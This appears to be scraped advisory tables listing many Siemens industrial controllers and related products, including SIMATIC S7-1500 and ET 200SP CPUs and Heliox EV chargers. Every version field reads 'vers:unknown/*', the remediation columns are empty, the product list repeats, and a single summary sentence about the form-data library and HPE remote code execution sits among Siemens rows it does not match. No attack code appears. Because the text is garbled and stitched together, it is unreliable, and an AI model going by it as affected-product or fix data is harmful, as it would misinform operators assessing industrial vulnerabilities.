vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
The form-data library's use of predictable random number generation for boundary values poses security risks, while vulnerabilities in HPE products allow for Remote Code Execution and Local Authentication Bypass.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
